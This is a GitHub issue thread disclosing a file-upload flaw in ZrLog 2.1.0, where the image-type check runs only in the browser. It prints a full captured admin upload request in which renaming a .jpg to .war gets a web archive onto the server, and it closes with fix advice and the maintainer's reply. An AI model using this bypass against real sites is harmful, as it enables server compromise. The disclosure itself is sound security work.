94fzb
commented
5 years ago Thank you suggestions. ZrLog now recommends run with Docker (Docker mode use jar instead of war). Will fix by whitelist way in next version
Closed zsdlove closed 1 year ago
94fzb
commented
5 years ago Thank you suggestions. ZrLog now recommends run with Docker (Docker mode use jar instead of war). Will fix by whitelist way in next version
There is a file upload api in the backend,which admin user can use it to upload the pictures.
it has file type check
but,the file tyep check is in the frontend which can be bypass by tamper with request packet.
how to prove that the file check is in the frontend?
1、search the key word “错误:只允许上传图片文件,允许上传的图片文件格式有” in the warming,
we can find information below:
the file check is in the file of zrlog-2.1.0\admin\markdown\js\editormd.min.js.
by modify the packet below: `POST /zrlog-2.1.0/api/admin/upload/?guid=1546955740878&dir=image HTTP/1.1 Host: 127.0.0.1:8080 Content-Length: 92883 Cache-Control: max-age=0 Origin: http://127.0.0.1:8080 Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryATR87YRSWfgChgZq User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8 Referer: http://127.0.0.1:8080/zrlog-2.1.0/admin/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: csrftoken=4YqHpDZtkQJbqwTt9bcAqP6UJjUtUdCEjVY42Q2p337RkWfOoFjxK3rnH2gM75Eb; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1542180522; admin-token=1#4E6D2F687756637630777677385938504D566B4155736C75364F7176443553364B65433758736A46336B62354D686E524F56597A563334624767563638364361517170385674356679797135695737326F2F6C39366172697475683146755554486F6E7877693564566D453D Connection: close
------WebKitFormBoundaryATR87YRSWfgChgZq Content-Disposition: form-data; name="imgFile"; filename="zsdlove2222.jpg" Content-Type: image/jpeg
ÿØÿà` we can modify the filename "zsdlove2222.jpg" to "zsdlove2222.war",then we send it to the servelet. and after that we find that we have upload the war file successfully.
suggestions: 1、check the file type in the backend. 2、use white namelist to limit the file type uplaoded. hope you guy fix this flaw quickly,if you have any questions in bug fix,contact me with the email: 747289639@qq.com